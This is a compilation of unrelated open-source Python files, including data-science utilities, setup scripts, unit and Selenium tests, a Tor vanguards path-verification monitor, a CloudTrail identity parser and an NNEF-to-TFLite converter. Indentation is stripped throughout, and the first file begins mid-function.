raise ValueError(f"Key={key} can not be None.")
else:
if isinstance(v, _type):
return v
else:
return cast_type(v, _type)
def get_from_dict(_dict, key, _type=int, default=None):
v = _dict.get(key, default)
if v is None:
return v
else:
if isinstance(v, _type):
return v
else:
return cast_type(v, _type)
def is_non_empty_list(o):
return o is not None and len(o) > 0
def is_empty_list(o):
return o is None or len(o) == 0
def is_non_empty_str(o):
return o is not None and isinstance(o, str) and len(o) > 0
def revert_to_dict_from_dict(d, key):
v = d.get(key)
if v is not None and len(v) > 0 and isinstance(v, str):
d[key] = loads(v)
def revert_to_dict_from_object(obj, *keys):
for key in keys:
v = getattr(obj, key)
if v is not None and len(v) > 0 and isinstance(v, str):
setattr(obj, key, loads(v))
def sqlalchemy_obj_to_dict(entity_instance):
return {attr.key: getattr(entity_instance, attr.key) for attr in entity_instance._sa_instance_state.attrs}
# s = datetime_diff_human_format_by_minute(get_now_datetime(), datetime.datetime(2019,9,29,10,10,10,10) )
# print(s)
def temporary_dataset_dir(dataset_name):
return P.join(consts.PATH_TEMPORARY_DATASET, dataset_name)
def dataset_dir(dataset_name):
return P.join(consts.PATH_DATASET, dataset_name)
def model_name(dataset_name, no_experiment):
return str("%s_%s" % (dataset_name, no_experiment))
def model_dir(dataset_name, model_name):
return P.join(dataset_dir(dataset_name), consts.FIELD_EXPERIMENT, model_name)
def read_csv(csv_file, has_header, default_headers=None):
import pandas as pd # took a lot of time(0.4s)
if has_header:
return pd.read_csv(csv_file) # read it all
else:
if default_headers is None:
raise ValueError("When has_header is False, param default_headers is required.")
df = pd.read_csv(csv_file, header=None)
df.columns = default_headers
return df
def relative_path(p: str, prefix=consts.DATA_DIR):
if p.startswith(prefix):
return p[len(prefix)+1:] # Fix: should not start with '/'
else:
raise ValueError(f"Path is not start with {prefix}.")
import pickle
ENCODING_LIST = ["iso-8859-1", "ascii", 'utf-8', "gbk", "gb2312", "gb18030"]
PICKLE_PROTOCOL = 2
if six.PY2:
PICKLE_PROTOCOL = 2
elif six.PY3:
PICKLE_PROTOCOL = 3
def serialize_with_ignore_variables(obj, variables):
"""
序列化对象时忽略部分属性。
:param obj:
:param variables:
:return:
"""
if variables is None:
variables = []
cache_map = {}
# 1. 忽略对象
for v_name in variables:
if hasattr(obj, v_name):
value = getattr(obj, v_name)
cache_map[v_name] = value
setattr(obj, v_name, None)
# 2. 导出数据
bytes_value = pickle.dumps(obj, protocol=PICKLE_PROTOCOL)
# 3. 还原对象
for k in cache_map:
setattr(obj, k, cache_map[k])
return bytes_value
def deserialize(data):
if six.PY2:
return pickle.loads(data)
else:
_e = None
for encoding in ENCODING_LIST:
try:
obj = pickle.loads(data, encoding=encoding)
return obj
except Exception as e:
_e = e
print("使用编码%s加载对象失败, 原因 %s。" % (encoding, str(e)))
raise _e
def load_pkl(file_path):
with open(file_path, 'rb') as f:
data = f.read()
return deserialize(data)
def serialize2bytes(obj):
return serialize_with_ignore_variables(obj, None)
def serialize2file(obj, path):
data = serialize_with_ignore_variables(obj, None)
with open(path, 'wb') as f:
f.write(data)
def script_path(script):
return f"{consts.PATH_INSTALL_HOME}/cooka/core/{script}"
def abs_path(p):
return P.join(consts.DATA_DIR, p)
def validate_sample_conf(sample_conf):
from cooka.common.model import SampleConf # fix import error
if sample_conf.sample_strategy == SampleConf.Strategy.Percentage:
if sample_conf.percentage <= 0 or sample_conf.percentage > 100:
raise ValueError(f"Param sample_conf.percentage should in (0, 100] but is {sample_conf.percentage}")
elif sample_conf.sample_strategy == SampleConf.Strategy.RandomRows:
if sample_conf.n_rows <= 0:
raise ValueError(f"Param sample_conf.n_rows should bigger than 0 but is {sample_conf.n_rows}")
elif sample_conf.sample_strategy == SampleConf.Strategy.WholeData:
pass
else:
raise ValueError(f"Unknown sample strategy: {sample_conf.sample_strategy}")
|
plugins/dbnd-docker/setup.py | busunkim96/dbnd | 224 | 12716169 | from os import path
import setuptools
from setuptools.config import read_configuration
BASE_PATH = path.dirname(__file__)
CFG_PATH = path.join(BASE_PATH, "setup.cfg")
config = read_configuration(CFG_PATH)
version = config["metadata"]["version"]
setuptools.setup(
name="dbnd-docker",
package_dir={"": "src"},
install_requires=[
"dbnd==" + version,
"dbnd-airflow==" + version,
"docker>=3.0",
# k8s
"kubernetes>=9.0.0",
"cryptography>=2.0.0",
],
entry_points={"dbnd": ["dbnd-docker = dbnd_docker._plugin"]},
)
|
uq360/utils/batch_features/batch_basic_pointwise_hist.py | Sclare87/UQ360 | 148 | 12716216 |
import numpy as np
from uq360.utils.batch_features.histogram_feature import SingleHistogramFeature
from uq360.utils.transformers.confidence_delta import ConfidenceDeltaTransformer
from uq360.utils.transformers.confidence_top import ConfidenceTopTransformer
from uq360.utils.transformers.confidence_entropy import ConfidenceEntropyTransformer
from uq360.utils.transformers.class_frequency import ClassFrequencyTransformer
class BasicPointwiseHistogramDistance(SingleHistogramFeature):
def __init__(self, bins=10):
super().__init__(bins)
self.fit_status = True
def set_pointwise_transformer(self, pointwise_transformer):
pass
# Top Confidence feature
class BatchConfidenceTop(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_top', ConfidenceTopTransformer())
@classmethod
def name(cls):
return ('confidence_top_distance')
# Construct a single histogram
def extract_histogram(self, vec):
bins = np.concatenate([np.linspace(0,0.9,num=10), np.linspace(0.91,1.0,num=10)])
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins)
hist = np.divide(hist, float(len(vec)))
return hist
# Confidence Delta feature
class BatchConfidenceDelta(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_delta', ConfidenceDeltaTransformer())
@classmethod
def name(cls):
return ('confidence_delta_distance')
# Confidence Entropy feature
class BatchConfidenceEntropy(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('confidence_entropy', ConfidenceEntropyTransformer())
self.changed_histogram = None
@classmethod
def name(cls):
return ('confidence_entropy_distance')
# Construct a single histogram
def extract_histogram(self, vec):
epsilon = 0.001
bins = np.concatenate([np.linspace(0,0.1,num=11), np.linspace(0.2,3.0,num=29)])
# Safety check in case your histogram misses.
too_high = np.mean([vec >= max(bins)])
too_low = np.mean([vec <= min(bins)])
if too_high > 0.5 or too_low > 0.5:
if self.changed_histogram != 'false':
# Don't change prod if test wasn't changed
bins = np.linspace(min(vec) - epsilon, max(vec)+epsilon, num=25)
print("Fixing too high, new histogram is ", bins)
else:
self.changed_histogram = 'false'
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins)
hist = np.divide(hist, float(len(vec)))
return hist
# Predicted class frequency ratio
class BatchClassFrequency(BasicPointwiseHistogramDistance):
def __init__(self):
super().__init__()
self.set_transformer('class_frequency', ClassFrequencyTransformer())
self.fit_status = False
@classmethod
def name(cls):
return ('class_frequency_distance')
def fit(self, x, y):
if self.fit_status:
return
else:
self.pointwise_transformer.fit(x,y)
self.fit_status = True
# Construct a single histogram
def extract_histogram(self, vec):
freq = self.pointwise_transformer.class_frequencies
ordered_freq = sorted(freq)
# Left edge, edges between each pair of frequencies, and right edge
bins = [ordered_freq[0] - 1]
lf = len(freq)-1
for i in range(lf):
bins.append(0.5*(ordered_freq[i]+ordered_freq[i+1]))
bins.append(ordered_freq[-1] + 1)
self.histogram_edges = bins
hist , _ = np.histogram(vec, bins=bins, density=False)
hist = np.divide(hist, float(len(vec)))
return hist
|
tests/common/test_meter.py | dk25021999/mmf | 3,252 | 12716243 | # Copyright (c) Facebook, Inc. and its affiliates.
import unittest
import torch
from mmf.common.meter import Meter
from mmf.common.report import Report
from mmf.common.sample import SampleList
class TestMeter(unittest.TestCase):
def test_meter_update_from_report(self):
meter = Meter()
prepared_batch = SampleList(
{"targets": torch.tensor([1, 2, 3, 4]), "dataset_type": "val"}
)
for idx in range(5):
model_output = {
"scores": torch.tensor([0, 1, 2, 3]),
"losses": {"loss": float(idx)},
}
report = Report(prepared_batch, model_output)
meter.update_from_report(report)
self.assertEqual(meter.loss.global_avg, 2.0)
self.assertEqual(meter.loss.avg, 2.0)
|
notifications/tests/sample_notifications/apps.py | pandafy/django-notifications | 1,354 | 12716259 | from notifications.apps import Config as NotificationConfig
class SampleNotificationsConfig(NotificationConfig):
name = 'notifications.tests.sample_notifications'
label = 'sample_notifications'
|
timemachines/skaters/rvr/rvrinclusion.py | iklasky/timemachines | 253 | 12716274 | <filename>timemachines/skaters/rvr/rvrinclusion.py
try:
import river
using_river = True
except ImportError:
using_river = False |
bonobo/util/collections.py | Playfloor/bonobo | 1,573 | 12716291 | <filename>bonobo/util/collections.py
import bisect
import functools
from collections import Sequence
class sortedlist(list):
"""
A list with an insort() method that wan be used to maintain sorted lists. The list by itself is not sorted, it's
up to the user to not insert unsorted elements.
"""
def insort(self, x):
"""
If the list is sorted, insert the element in the right place. Otherwise, unpredictable behaviour.
:param x:
"""
bisect.insort(self, x)
def _with_length_check(f):
@functools.wraps(f)
def _wrapped(*args, length=None, **kwargs):
nonlocal f
result = f(*args, **kwargs)
if length is not None:
if length != len(result):
raise TypeError(
"Length check failed, expected {} fields but got {}: {!r}.".format(length, len(result), result)
)
return result
return _wrapped
def tuple_or_const(tuple_or_mixed, *, consts=(None, False), **kwargs):
"""
Like ensure_tuple, but also accept as valid outputs a list of constants.
"""
if tuple_or_mixed in consts:
return tuple_or_mixed
if isinstance(tuple_or_mixed, str):
pass
elif isinstance(tuple_or_mixed, Sequence):
tuple_or_mixed = tuple(tuple_or_mixed)
return ensure_tuple(tuple_or_mixed, **kwargs)
@_with_length_check
def ensure_tuple(tuple_or_mixed, *, cls=None):
"""
If it's not a tuple, let's make a tuple of one item.
Otherwise, not changed.
:param tuple_or_mixed: material to work on.
:param cls: type of the resulting tuple, or `tuple` if not provided.
:param length: provided by `_with_length_check` decorator, if specified, make sure that the tuple is of this
length (and raise a `TypeError` if not), otherwise, do nothing.
:return: tuple (or something of type `cls`, if provided)
"""
if cls is None:
cls = tuple
if isinstance(tuple_or_mixed, cls):
return tuple_or_mixed
if tuple_or_mixed is None:
return tuple.__new__(cls, ())
if isinstance(tuple_or_mixed, tuple):
return tuple.__new__(cls, tuple_or_mixed)
return tuple.__new__(cls, (tuple_or_mixed,))
def cast(type_):
def _wrap_cast(f):
@functools.wraps(f)
def _wrapped_cast(*args, **kwargs):
nonlocal f, type_
return type_(f(*args, **kwargs))
return _wrapped_cast
return _wrap_cast
tuplize = cast(tuple)
tuplize.__doc__ = """
Decorates a generator and make it a tuple-returning function. As a side effect, it can also decorate any
iterator-returning function to force return value to be a tuple.
>>> tuplized_lambda = tuplize(lambda: [1, 2, 3])
>>> tuplized_lambda()
(1, 2, 3)
>>> @tuplize
... def my_generator():
... yield 1
... yield 2
... yield 3
...
>>> my_generator()
(1, 2, 3)
"""
def coalesce(*values):
"""
Returns the first argument which is not None, or None if all arguments are None.
"""
if not len(values):
raise ValueError("Cannot coalesce an empty list of arguments.")
for value in values:
if value is not None:
return value
return None
|
src/vanguards/pathverify.py | mikeperry-tor/vanguards | 132 | 12716294 | """ Simple checks against bandwidth side channels """
import stem
from . import control
from .logger import plog
_ROUTELEN_FOR_PURPOSE = {
"HS_VANGUARDS" : 4,
"HS_CLIENT_HSDIR" : 5,
"HS_CLIENT_INTRO" : 5,
"HS_CLIENT_REND" : 4,
"HS_SERVICE_HSDIR" : 4,
"HS_SERVICE_INTRO" : 4,
"HS_SERVICE_REND" : 5
}
# XXX: Hrmm
_ROUTELEN_FOR_PURPOSE_LITE = {
"HS_VANGUARDS" : 3,
"HS_CLIENT_HSDIR" : 4,
"HS_CLIENT_INTRO" : 4,
"HS_CLIENT_REND" : 3,
"HS_SERVICE_HSDIR" : 4,
"HS_SERVICE_INTRO" : 4,
"HS_SERVICE_REND" : 4
}
class Layer1Stats:
def __init__(self):
self.use_count = 0
self.conn_count = 1
class Layer1Guards:
def __init__(self, num_layer1):
self.guards = {}
self.num_layer1 = num_layer1
def add_conn(self, guard_fp):
if guard_fp in self.guards:
self.guards[guard_fp].conn_count += 1
else:
self.guards[guard_fp] = Layer1Stats()
def del_conn(self, guard_fp):
if guard_fp in self.guards:
if self.guards[guard_fp].conn_count > 1:
self.guards[guard_fp].conn_count -= 1
else:
del self.guards[guard_fp]
# Returns -1 when fewer than expected, 0 when correct, +1 when too many
# (Retval used only by tests)
def check_conn_counts(self):
ret = 0
if len(self.guards) < self.num_layer1:
plog("NOTICE", "Fewer guard connections than configured. Connected to: "+ \
str(self.guards.keys()))
ret = -1
elif len(self.guards) > self.num_layer1:
plog("NOTICE", "More guard connections than configured. Connected to: "+ \
str(self.guards.keys()))
ret = 1
for g in self.guards.keys():
if self.guards[g].conn_count > 1:
plog("NOTICE", "Extra connections to guard "+g+": "+\
str(self.guards[g].conn_count))
ret = 1
return ret
def add_use_count(self, guard_fp):
if not guard_fp in self.guards:
plog("WARN", "Guard "+guard_fp+" not in "+ \
str(self.guards.keys()))
else:
self.guards[guard_fp].use_count += 1
# Returns -1 when fewer than expected, 0 when correct, +1 when too many
# (Retval used only by tests)
def check_use_counts(self):
ret = 0
layer1_in_use = list(filter(lambda x: self.guards[x].use_count,
self.guards.keys()))
layer1_counts = list(map(lambda x:
x+": "+str(self.guards[x].use_count),
layer1_in_use))
if len(layer1_in_use) > self.num_layer1:
plog("WARN", "Circuits are being used on more guards " + \
"than configured. Current guard use: "+str(layer1_counts))
ret = 1
elif len(layer1_in_use) < self.num_layer1:
plog("NOTICE", "Circuits are being used on fewer guards " + \
"than configured. Current guard use: "+str(layer1_counts))
ret = -1
return ret
class PathVerify:
def __init__(self, controller, full_vanguards, num_layer1, num_layer2, num_layer3):
self.controller = controller
self.full_vanguards = full_vanguards
self.layer2 = set()
self.layer3 = set()
self.num_layer1 = num_layer1
self.num_layer2 = num_layer2
self.num_layer3 = num_layer3
self._layers_init(controller)
self.layer1 = Layer1Guards(self.num_layer1)
self._orconn_init(controller)
def _orconn_init(self, controller):
for l in controller.get_info("orconn-status").split("\n"):
if len(l):
guard_fp = l.split("~")[0][1:]
self.layer1.add_conn(guard_fp)
self.layer1.check_conn_counts()
def _layers_init(self, controller):
layer2 = controller.get_conf("HSLayer2Nodes", None)
layer3 = controller.get_conf("HSLayer3Nodes", None)
# These may be empty at startup
if layer2:
self.layer2 = set(layer2.split(","))
self.full_vanguards = True
if layer3:
self.layer3 = set(layer3.split(","))
self.full_vanguards = True
# If they are empty, and vanguards is disabled by the addon,
# then we're just verifying vg-lite in C-Tor.
if not layer2 and not layer3 and not self.full_vanguards:
plog("NOTICE", "Monitoring vanguards-lite with pathverify.")
# Update our num layer params because they now depend on vg-lite
self.num_layer1 = 1
self.num_layer2 = 4
self.num_layer3 = 0
else:
plog("NOTICE", "Monitoring vanguards with pathverify.")
self._check_layer_counts()
def conf_changed_event(self, event):
if "HSLayer2Nodes" in event.changed:
self.layer2 = set(event.changed["HSLayer2Nodes"][0].split(","))
self.full_vanguards = True
if "HSLayer3Nodes" in event.changed:
self.layer3 = set(event.changed["HSLayer3Nodes"][0].split(","))
self.full_vanguards = True
self._check_layer_counts()
plog("DEBUG", event.raw_content())
# Returns True when right number, False otherwise
def _check_layer_counts(self):
ret = False
# These can become empty briefly on sighup and startup. Aka set([''])
if len(self.layer2) > 1:
if len(self.layer2) != self.num_layer2:
plog("NOTICE", "Wrong number of layer2 guards. " + \
str(self.num_layer2)+" vs: "+str(self.layer2))
ret = False
else:
ret = True
if len(self.layer3) > 1:
if len(self.layer3) != self.num_layer3:
plog("NOTICE", "Wrong number of layer3 guards. " + \
str(self.num_layer3)+" vs: "+str(self.layer3))
ret = False
else:
ret = True
return ret
def orconn_event(self, event):
if event.status == "CONNECTED":
self.layer1.add_conn(event.endpoint_fingerprint)
elif event.status == "CLOSED" or event.status == "FAILED":
self.layer1.del_conn(event.endpoint_fingerprint)
self.layer1.check_conn_counts()
def guard_event(self, event):
if event.status == "GOOD_L2":
self.layer2.add(event.endpoint_fingerprint)
elif event.status == "BAD_L2":
self.layer2.discard(event.endpoint_fingerprint)
plog("DEBUG", event.raw_content())
def routelen_for_purpose(self, purpose):
if self.full_vanguards:
return _ROUTELEN_FOR_PURPOSE[purpose]
else:
return _ROUTELEN_FOR_PURPOSE_LITE[purpose]
def circ_event(self, event):
if event.purpose[0:3] == "HS_" and (event.status == stem.CircStatus.BUILT or \
event.status == "GUARD_WAIT"):
if len(event.path) != self.routelen_for_purpose(event.purpose):
if (event.purpose == "HS_SERVICE_HSDIR" and \
event.hs_state == "HSSI_CONNECTING") or \
(event.purpose == "HS_CLIENT_INTRO" and \
event.hs_state == "HSCI_CONNECTING"):
# This can happen when HS_VANGUARDS are cannibalized..
# XXX: Is that a bug?
# It can also happen if client intros fail and are retried with a
# new hop. That case is not a bug.
plog("INFO", "Tor made a "+str(len(event.path))+ "-hop path, but I wanted a " + \
str(self.routelen_for_purpose(event.purpose))+ "-hop path for purpose " + \
event.purpose +":"+str(event.hs_state)+" + " + \
event.raw_content())
else:
plog("NOTICE", "Tor made a "+str(len(event.path))+ "-hop path, but I wanted a " + \
str(self.routelen_for_purpose(event.purpose))+ "-hop path for purpose " + \
event.purpose +":"+str(event.hs_state)+" + " + \
event.raw_content())
self.layer1.add_use_count(event.path[0][0])
self.layer1.check_use_counts()
if not event.path[1][0] in self.layer2:
plog("WARN", "Layer2 "+event.path[1][0]+" not in "+ \
str(self.layer2))
if self.num_layer3 and not event.path[2][0] in self.layer3:
plog("WARN", "Layer3 "+event.path[1][0]+" not in "+ \
str(self.layer3))
if len(self.layer2) != self.num_layer2:
plog("WARN", "Circuit built with different number of layer2 nodes " + \
"than configured. Currently using: " + str(self.layer2))
if len(self.layer3) != self.num_layer3:
plog("WARN", "Circuit built with different number of layer3 nodes " + \
"than configured. Currently using: " + str(self.layer3))
def circ_minor_event(self, event):
if event.purpose[0:3] == "HS_" and event.old_purpose[0:3] != "HS_":
plog("WARN", "Purpose switched from non-hs to hs: "+ \
str(event.raw_content()))
elif event.purpose[0:3] != "HS_" and event.old_purpose[0:3] == "HS_":
if event.purpose != "CIRCUIT_PADDING" and \
event.purpose != "MEASURE_TIMEOUT" and \
event.purpose != "PATH_BIAS_TESTING":
plog("WARN", "Purpose switched from hs to non-hs: "+ \
str(event.raw_content()))
if event.purpose[0:3] == "HS_" or event.old_purpose[0:3] == "HS_":
if not event.path[0][0] in self.layer1.guards:
plog("WARN", "Guard "+event.path[0][0]+" not in "+ \
str(self.layer1.guards.keys()))
if len(event.path) > 1 and not event.path[1][0] in self.layer2:
plog("WARN", "Layer2 "+event.path[1][0]+" not in "+ \
str(self.layer2))
if self.num_layer3 and len(event.path) > 2 and not event.path[2][0] in self.layer3:
plog("WARN", "Layer3 "+event.path[1][0]+" not in "+ \
str(self.layer3))
|
structures/UserIdentity.py | houey/SkyWrapper | 106 | 12716301 | from parsers import UserIdentityParser
# User identity properties
USER_IDENTITY_TYPE = "type"
USER_IDENTITY_PRINCIPAL_ID = "principalid"
USER_IDENTITY_ARN = "arn"
USER_IDENTITY_ACCOUNT_ID = "accountid"
USER_IDENTITY_INVOKED_BY = "invokedby"
USER_IDENTITY_ACCESS_KEY_ID = "accesskeyid"
USER_IDENTITY_USERNAME = "username"
USER_IDENTITY_SESSION_CONTEXT = "sessioncontext"
class UserIdentity(object):
def __init__(self, user_identity_data):
self.user_identity_data = user_identity_data
self.type = None
self.principal_id = None
self.arn = None
self.account_id = None
self.invoked_by = None
self.access_key_id = None
self.username = None
self.session_context = None
self.object = None
self.__parse()
def __parse(self):
self.object = UserIdentityParser.parse_user_identity_filed(self.user_identity_data)
self.type = self.object[USER_IDENTITY_TYPE]
self.principal_id = self.object[USER_IDENTITY_PRINCIPAL_ID]
self.arn = self.object[USER_IDENTITY_ARN]
self.account_id = self.object[USER_IDENTITY_ACCOUNT_ID]
self.invoked_by = self.object[USER_IDENTITY_INVOKED_BY]
self.access_key_id = self.object[USER_IDENTITY_ACCESS_KEY_ID]
self.username = self.object[USER_IDENTITY_USERNAME]
self.session_context = self.object[USER_IDENTITY_SESSION_CONTEXT]
def __repr__(self):
return str(self.__dict__) |
lib/galaxy_test/selenium/test_history_panel_pagination.py | quacksawbones/galaxy-1 | 1,085 | 12716302 | import pytest
from galaxy_test.base.populators import flakey
from .framework import (
selenium_test,
SeleniumTestCase
)
class HistoryPanelPaginationTestCase(SeleniumTestCase):
ensure_registered = True
@selenium_test
@flakey # The next button doesn't always work - maybe a delay in JS callback registering for that.
def test_pagination(self):
if self.is_beta_history():
raise pytest.skip("There is no pagination on the beta history panel")
history_id = self.current_history_id()
self.dataset_populator.new_dataset(history_id, content='1\t2\t3', name="data1")
self.dataset_populator.new_dataset(history_id, content='2\t3\t4', name="data2")
self.dataset_populator.new_dataset(history_id, content='3\t4\t5', name="data3")
self.dataset_populator.new_dataset(history_id, content='4\t5\t6', name="data4")
self.dataset_populator.new_dataset(history_id, content='5\t6\t7', name="data5")
self.home()
for hid in [1, 2, 3, 4, 5]:
self.history_panel_wait_for_hid_state(hid, "ok")
with self.local_storage("historyContentsLimitPerPageDefault", 3):
self.home()
self.history_panel_wait_for_hid_state(5, "ok")
self.screenshot("history_panel_pagination_initial")
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "1st of 2 pages" in pagination_option_text
self.components.history_panel.pagination_pages.wait_for_and_click()
self.screenshot("history_panel_pagination_pages_drop_down")
self.components.history_panel.pagination_next.wait_for_and_click()
self.sleep_for(self.wait_types.UX_TRANSITION)
self.screenshot("history_panel_pagination_second")
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "2nd of 2 pages" in pagination_option_text
self.components.history_panel.pagination_previous.wait_for_and_click()
self.sleep_for(self.wait_types.UX_TRANSITION)
pagination_option_text = self.components.history_panel.pagination_pages_selected_option.wait_for_text()
assert "1st of 2 pages" in pagination_option_text
|
dfirtrack_api/tests/dfirtrack_artifacts/artifactstatus/test_artifactstatus_api_views.py | thomas-kropeit/dfirtrack | 273 | 12716306 | import urllib.parse
from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_artifacts.models import Artifactstatus
class ArtifactstatusAPIViewTestCase(TestCase):
"""artifactstatus API view tests"""
@classmethod
def setUpTestData(cls):
# create object
Artifactstatus.objects.create(artifactstatus_name='artifactstatus_api_1')
# create user
User.objects.create_user(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
def test_artifactstatus_list_api_unauthorized(self):
"""unauthorized access is forbidden"""
# get response
response = self.client.get('/api/artifactstatus/')
# compare
self.assertEqual(response.status_code, 401)
def test_artifactstatus_list_api_method_get(self):
"""GET is allowed"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.get('/api/artifactstatus/')
# compare
self.assertEqual(response.status_code, 200)
def test_artifactstatus_list_api_method_post(self):
"""POST is forbidden"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create POST string
poststring = {"artifactstatus_name": "artifactstatus_api_2"}
# get response
response = self.client.post('/api/artifactstatus/', data=poststring)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_list_api_redirect(self):
"""test redirect with appending slash"""
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
destination = urllib.parse.quote('/api/artifactstatus/', safe='/')
# get response
response = self.client.get('/api/artifactstatus', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_artifactstatus_detail_api_unauthorized(self):
"""unauthorized access is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 401)
def test_artifactstatus_detail_api_method_get(self):
"""GET is allowed"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 200)
def test_artifactstatus_detail_api_method_delete(self):
"""DELETE is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# get response
response = self.client.delete(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/'
)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_detail_api_method_put(self):
"""PUT is forbidden"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
destination = urllib.parse.quote(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/',
safe='/',
)
# create PUT string
putstring = {"artifactstatus_name": "new_artifactstatus_api_1"}
# get response
response = self.client.put(
destination, data=putstring, content_type='application/json'
)
# compare
self.assertEqual(response.status_code, 405)
def test_artifactstatus_detail_api_redirect(self):
"""test redirect with appending slash"""
# get object
artifactstatus_api_1 = Artifactstatus.objects.get(
artifactstatus_name='artifactstatus_api_1'
)
# login testuser
self.client.login(
username='testuser_artifactstatus_api', password='<PASSWORD>'
)
# create url
destination = urllib.parse.quote(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id) + '/',
safe='/',
)
# get response
response = self.client.get(
'/api/artifactstatus/' + str(artifactstatus_api_1.artifactstatus_id),
follow=True,
)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
|
PyObjCTest/test_nsconnection.py | Khan/pyobjc-framework-Cocoa | 132 | 12716411 | from PyObjCTools.TestSupport import *
from Foundation import *
try:
unicode
except NameError:
unicode = str
class TestNSConnectionHelper (NSObject):
def makeNewConnection_sender_(self, a, b): return 1
def connection_shouldMakeNewConnection_(self, a, b): return 1
def authenticateComponents_withData_(self, a, b): return 1
def connection_handleRequest_(self, a, b): return 1
class TestNSConnection (TestCase):
def testConstants(self):
self.assertIsInstance(NSConnectionReplyMode, unicode)
self.assertIsInstance(NSConnectionDidDieNotification, unicode)
self.assertIsInstance(NSFailedAuthenticationException, unicode)
self.assertIsInstance(NSConnectionDidInitializeNotification, unicode)
def testMethods(self):
self.assertArgIsBOOL(NSConnection.setIndependentConversationQueueing_, 0)
self.assertResultIsBOOL(NSConnection.independentConversationQueueing)
self.assertResultIsBOOL(NSConnection.isValid)
self.assertResultIsBOOL(NSConnection.registerName_)
self.assertResultIsBOOL(NSConnection.registerName_withNameServer_)
self.assertResultIsBOOL(NSConnection.multipleThreadsEnabled)
def testProtocols(self):
self.assertResultIsBOOL(TestNSConnectionHelper.makeNewConnection_sender_)
self.assertResultIsBOOL(TestNSConnectionHelper.connection_shouldMakeNewConnection_)
self.assertResultIsBOOL(TestNSConnectionHelper.authenticateComponents_withData_)
self.assertResultIsBOOL(TestNSConnectionHelper.connection_handleRequest_)
if __name__ == "__main__":
main()
|
nnef_tools/conversion/nnef_to_tflite.py | KhronosGroup/NNEF-Tools | 193 | 12716424 | <gh_stars>100-1000
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function, absolute_import
from .converter import ConverterFromNNEF as _Converter, Transform, ConversionError
from .nnef_to_tf import Converter as _TFConverter, _Transforms as _TFTransforms
from ..model import Tensor, Operation
from ..model.utils import generate_tensor_names_from_op_type
from ..io.tf.lite import CustomOptionsKey
import numpy as np
import copy
def tflite_detection_postprocess_shape(input, scores, anchors, **kwargs):
return [], [], [], []
class Converter(_TFConverter):
@staticmethod
def defined_shapes():
return {
'relu6': lambda shape: shape,
'TFLite_Detection_PostProcess': tflite_detection_postprocess_shape,
}
@staticmethod
def decomposed_operations():
return _Converter.decomposed_operations()
def __init__(self, io_transpose=False, custom_transforms=None, custom_functions=None, mirror_unsupported=False):
_Converter.__init__(self, transforms=self.merge_transforms(_Transforms, custom_transforms),
functions=custom_functions, mirror_unsupported=mirror_unsupported)
self._data_format = 'NXC'
self._io_transpose = io_transpose
def __call__(self, graph):
graph = _TFConverter.__call__(self, graph)
self._generate_tensor_names(graph)
self._fix_custom_options(graph)
return graph
def _global_attribs(self):
return {'_lite_': True}
def _prepare(self, graph):
self._fix_quantized_dtypes(graph)
self._fix_quantization_attribs(graph)
self._transpose_externals(graph)
def _transpose_externals(self, graph):
for tensor in graph.tensors:
mapped = self._tensor_map[tensor]
if mapped.producer and mapped.producer.type == 'external' and self.needs_io_transpose(tensor):
self._transposes[tensor] = self.ncx_to_nxc(tensor.shape)
def _generate_tensor_names(self, graph):
generate_tensor_names_from_op_type(graph)
placeholders = 0
constants = 0
for tensor in graph.tensors:
if tensor.name is None:
if tensor.data is None:
placeholders += 1
tensor.name = 'PLACEHOLDER' + str(placeholders)
else:
constants += 1
tensor.name = 'CONSTANT' + str(constants)
def _fix_quantized_dtypes(self, graph):
for tensor in graph.tensors:
if tensor.quant and tensor.dtype == np.float32:
bits = tensor.quant['bits']
signed = tensor.quant['signed']
assert bits == 8 or bits == 32
tensor.dtype = (np.int8 if signed else np.uint8) if bits == 8 else (np.int32 if signed else np.uint32)
